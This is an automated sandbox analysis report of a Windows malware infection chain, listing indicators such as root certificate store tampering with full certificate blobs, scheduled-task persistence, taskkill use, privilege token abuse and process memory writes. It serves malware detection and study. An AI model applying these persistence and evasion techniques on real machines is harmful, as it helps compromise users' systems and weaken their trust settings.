Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	29422	Go-http-client/1.1

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
2132	taskkill.exe
4728	taskkill.exe
548	taskkill.exe
3308	taskkill.exe
5128	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000_Classes\Local Settings	rapes.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1516	reg.exe

Modifies system certificate store 2 TTPs 12 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B\Blob = 0f00000001000000200000003560e45b41e46b8f36537025d1d5bc02d9652a10645b0eff69e8b6a52191f335090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b000000010000005200000047006f00200044006100640064007900200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790020001320200047003200000053000000010000002500000030233021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c062000000010000002000000045140b3247eb9cc8c5b4f0d7b53091f73292089e6e5a63e2749dd3aca9198eda1400000001000000140000003a9a8507106728b6eff6bd05416e20c194da0fde1d000000010000001000000070253fbcbde32a014d38c1993098ad9903000000010000001400000047beabc922eae80e78783462a79f45c254fde68b2000000001000000c9030000308203c5308202ada003020102020100300d06092a864886f70d01010b0500308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bf716208f1fa5934f71bc918a3f7804958e9228313a6c52043013b84f1e685499f27eaf6841b4ea0b4db7098c73201b1053e074eeef4fa4f2f593022e7ab19566be28007fcf316758039517be5f935b6744ea98d8213e4b63fa90383faa2be8a156a7fde0bc3b6191405caeac3a804943b467c320df3006622c88d696d368c1118b7d3b21c60b438fa028cced3dd4607de0a3eeb5d7cc87cfbb02b53a4926269512505611a44818c2ca9439623dfac3a819a0e29c51ca9e95d1eb69e9e300a39cef18880fb4b5dcc32ec85624325340256270191b43b702a3f6eb1e89c88017d9fd4f9db536d609dbf2ce758abb85f46fccec41b033c09eb49315c6946b3e0470203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604143a9a8507106728b6eff6bd05416e20c194da0fde300d06092a864886f70d01010b0500038201010099db5d79d5f99759670361f17e3b0631752da1208e4f6587b4f7a69cbcd8e92fd0db5aeecf748c73b43842da057bf80275b8fda5b1d7aef6d7de13cb53107e8a46d197fab72e2b11ab90b02780f9e89f5ae9379fabe4df6cb385179d3dd9244f799135d65f04eb8083ab9a022db510f4d890c7047340ed7225a0a99fec9eab68129957c68f123a09a4bd44fd061537c19be432a3ed38e8d864f32c7e14fc02ea9fcdff076817db2290382d7a8dd154f169e35f33ca7a3d7b0ae3ca7f5f39e5e275bac5761833ce2cf02f4cadf7b1e7ce4fa8c49b4a5406c57f7dd5080fe21cfe7e17b8ac5ef6d416b243090c4df6a76bb4998465ca7a88e2e244be5cf7ea1cf5	pcidrv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 0f000000010000002000000071b437f087f3700ffd4e2fa46f42b6b810d7bf19adfedf951c023edd65b50b050b000000010000005400000053007400610072006600690065006c006400200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900200013202000470032000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000002500000030233021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c06200000001000000200000002ce1cb0bf9d2f9e102993fbe215152c3b2dd0cabde1c68e5319b839154dbb7f51400000001000000140000007c0c321fa7d9307fc47d68a362a8a1ceab075b271d000000010000001000000054e2cd85ba79cda018fed9e6a863aa46030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e2000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4	pcidrv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	pcidrv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	pcidrv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	pcidrv.exe
Key created	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\CBFE9EB43B3B37FE0DFBC4C2EB2D4E07D08BD8E8	pcidrv.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\CBFE9EB43B3B37FE0DFBC4C2EB2D4E07D08BD8E8\Blob = 030000000100000014000000cbfe9eb43b3b37fe0dfbc4c2eb2d4e07d08bd8e81400000001000000140000000cdb6c82490f4a670ab814ee7ac4485288eb563804000000010000001000000098eb0b62c3fe53eac8caa8fdb58020ee0f0000000100000020000000b4e0a8c98b0aae43b7383037accd11a1c964971f6b74fcbc370cd030fb328ddd19000000010000001000000058f4c3aea49be319eaff0e54cef46cd35c00000001000000040000000008000018000000010000001000000014c3bd3549ee225aece13734ad8ca0b84b0000000100000044000000450032004300360043004200410046003000410046003000380043004600320030003300420041003700340042004600300044003000410042003600440035005f0000002000000001000000b7040000308204b33082039ba00302010202100b259422ced9812a15a04e99528a0efa300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3137313130323132323433335a170d3237313130323132323433335a3060310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d311f301d06035504031316526170696453534c20544c532052534120434120473130820122300d06092a864886f70d01010105000382010f003082010a0282010100bfb9592544123516e25d5049050ae0cbfc8dda25089a67a6a26d11e36a9fdaa7dcf2d5a60dae985eed871a3703283ec66f5c347e84d24ea3d81b80e6154cfabc81773ce08ef960a38789503836b249419ea9dac250caac7ad07904223cc837ed4b40b7d74e5a6ece74e839ad61c930f4cb28ad172398c1444cfbf088f05345329061c36da1a5e01090e38b9aca93e5064961e8a4eea96f9fc81f0fe5dd0e7937924baebb4786fafbb2ad21abe6e5f92d18455a5bf5cc5403721fc42a6775eb79bacffc9cc7fa8b6bdcf2bc82dcedc4296fe93b4cbadaf56135ed83d29fd00d8c6f840a8f4f0d6dcdf65c2129008dbf0d601a882ec8242eec713b0675bc7924850203010001a382016630820162301d0603551d0e041604140cdb6c82490f4a670ab814ee7ac4485288eb5638301f0603551d230418301680144e2254201895e6e36ee60ffafab912ed06178f39300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d30420603551d1f043b30393037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7447322e63726c30630603551d20045c305a303706096086480186fd6c0101302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f435053300b06096086480186fd6c01023008060667810c0102013008060667810c010202300d06092a864886f70d01010b050003820101001944a539be0add6b664a56e6139d146011d733448a5cfa8733393a5d05290a1785ff8a94f1a3a16a3b324501435758a1fee3c883b60746d162093ab81becdbe375f54fbee726048e23da6afd3a82c2dba467bbbd54b2f7240ab759dcb69a828bbef0bcb55991ce401ed314029112888db046f34312c835ff478b98823e9988d4ff660e8623a4687e0aa0a4376cb0b7345c8450128b7121970accfde9189f4509b30798c2cbcae05dfae096bd5705da881801ac2e7c2852fcf4fad43f6bab33d14b9236baa6b7b66213e382612605a106714c6fb006424bcdabd28d4bd75ddc659cd7b1ff7576b57a7a31cd68c4d2105d163c4f8546f45b7c22f28df8fe6f05c7	pcidrv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E	pcidrv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	pcidrv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	pcidrv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	pcidrv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B	pcidrv.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3492	schtasks.exe
2096	schtasks.exe
6080	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4068	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1636	1P22P6.exe
1636	1P22P6.exe
4852	rapes.exe
4852	rapes.exe
4844	2i0393.exe
4844	2i0393.exe
4844	2i0393.exe
4844	2i0393.exe
4844	2i0393.exe
4844	2i0393.exe
1216	0487ffa47e.exe
1216	0487ffa47e.exe
5912	d5441f9198.exe
5912	d5441f9198.exe
5912	d5441f9198.exe
5912	d5441f9198.exe
5912	d5441f9198.exe
5912	d5441f9198.exe
2480	9sWdA2p.exe
2480	9sWdA2p.exe
2480	9sWdA2p.exe
2480	9sWdA2p.exe
2480	9sWdA2p.exe
2480	9sWdA2p.exe
2504	but2.exe
2504	but2.exe
1364	rapes.exe
1364	rapes.exe
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com
272	qhjMWht.exe
272	qhjMWht.exe
272	qhjMWht.exe
272	qhjMWht.exe
272	qhjMWht.exe
272	qhjMWht.exe
544	powershell.exe
544	powershell.exe
4332	rapes.exe
4332	rapes.exe
5700	MSBuild.exe
5700	MSBuild.exe
5700	MSBuild.exe
5700	MSBuild.exe
5584	MSBuild.exe
5584	MSBuild.exe
5584	MSBuild.exe
5584	MSBuild.exe
4068	powershell.exe
4068	powershell.exe
4108	MSBuild.exe
4108	MSBuild.exe
4108	MSBuild.exe
4108	MSBuild.exe
4108	MSBuild.exe
4176	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
2476	msedge.exe
2476	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4368	tasklist.exe
Token: SeDebugPrivilege	2652	tasklist.exe
Token: SeDebugPrivilege	1160	RYZusWg.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeIncreaseQuotaPrivilege	544	powershell.exe
Token: SeSecurityPrivilege	544	powershell.exe
Token: SeTakeOwnershipPrivilege	544	powershell.exe
Token: SeLoadDriverPrivilege	544	powershell.exe
Token: SeSystemProfilePrivilege	544	powershell.exe
Token: SeSystemtimePrivilege	544	powershell.exe
Token: SeProfSingleProcessPrivilege	544	powershell.exe
Token: SeIncBasePriorityPrivilege	544	powershell.exe
Token: SeCreatePagefilePrivilege	544	powershell.exe
Token: SeBackupPrivilege	544	powershell.exe
Token: SeRestorePrivilege	544	powershell.exe
Token: SeShutdownPrivilege	544	powershell.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeSystemEnvironmentPrivilege	544	powershell.exe
Token: SeRemoteShutdownPrivilege	544	powershell.exe
Token: SeUndockPrivilege	544	powershell.exe
Token: SeManageVolumePrivilege	544	powershell.exe
Token: 33	544	powershell.exe
Token: 34	544	powershell.exe
Token: 35	544	powershell.exe
Token: 36	544	powershell.exe
Token: SeIncreaseQuotaPrivilege	544	powershell.exe
Token: SeSecurityPrivilege	544	powershell.exe
Token: SeTakeOwnershipPrivilege	544	powershell.exe
Token: SeLoadDriverPrivilege	544	powershell.exe
Token: SeSystemProfilePrivilege	544	powershell.exe
Token: SeSystemtimePrivilege	544	powershell.exe
Token: SeProfSingleProcessPrivilege	544	powershell.exe
Token: SeIncBasePriorityPrivilege	544	powershell.exe
Token: SeCreatePagefilePrivilege	544	powershell.exe
Token: SeBackupPrivilege	544	powershell.exe
Token: SeRestorePrivilege	544	powershell.exe
Token: SeShutdownPrivilege	544	powershell.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeSystemEnvironmentPrivilege	544	powershell.exe
Token: SeRemoteShutdownPrivilege	544	powershell.exe
Token: SeUndockPrivilege	544	powershell.exe
Token: SeManageVolumePrivilege	544	powershell.exe
Token: 33	544	powershell.exe
Token: 34	544	powershell.exe
Token: 35	544	powershell.exe
Token: 36	544	powershell.exe
Token: SeDebugPrivilege	4692	IsValueCreated.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	4108	MSBuild.exe
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeIncreaseQuotaPrivilege	4176	powershell.exe
Token: SeSecurityPrivilege	4176	powershell.exe
Token: SeTakeOwnershipPrivilege	4176	powershell.exe
Token: SeLoadDriverPrivilege	4176	powershell.exe
Token: SeSystemProfilePrivilege	4176	powershell.exe
Token: SeSystemtimePrivilege	4176	powershell.exe
Token: SeProfSingleProcessPrivilege	4176	powershell.exe
Token: SeIncBasePriorityPrivilege	4176	powershell.exe
Token: SeCreatePagefilePrivilege	4176	powershell.exe
Token: SeBackupPrivilege	4176	powershell.exe
Token: SeRestorePrivilege	4176	powershell.exe
Token: SeShutdownPrivilege	4176	powershell.exe
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeSystemEnvironmentPrivilege	4176	powershell.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
1636	1P22P6.exe
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com
3520	AddInProcess.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
4924	chrome.exe
2476	msedge.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1204	Jordan.com
1204	Jordan.com
1204	Jordan.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3280 wrote to memory of 4536	3280	random.exe	85
PID 3280 wrote to memory of 4536	3280	random.exe	85
PID 3280 wrote to memory of 4536	3280	random.exe	85
PID 4536 wrote to memory of 1636	4536	x2T29.exe	88
PID 4536 wrote to memory of 1636	4536	x2T29.exe	88
PID 4536 wrote to memory of 1636	4536	x2T29.exe	88
PID 1324 wrote to memory of 5908	1324	cmd.exe	89
PID 1324 wrote to memory of 5908	1324	cmd.exe	89
PID 3252 wrote to memory of 5940	3252	cmd.exe	90
PID 3252 wrote to memory of 5940	3252	cmd.exe	90
PID 1636 wrote to memory of 4852	1636	1P22P6.exe	91
PID 1636 wrote to memory of 4852	1636	1P22P6.exe	91
PID 1636 wrote to memory of 4852	1636	1P22P6.exe	91
PID 4536 wrote to memory of 4844	4536	x2T29.exe	92
PID 4536 wrote to memory of 4844	4536	x2T29.exe	92
PID 4536 wrote to memory of 4844	4536	x2T29.exe	92
PID 4852 wrote to memory of 1216	4852	rapes.exe	99
PID 4852 wrote to memory of 1216	4852	rapes.exe	99
PID 4852 wrote to memory of 1216	4852	rapes.exe	99
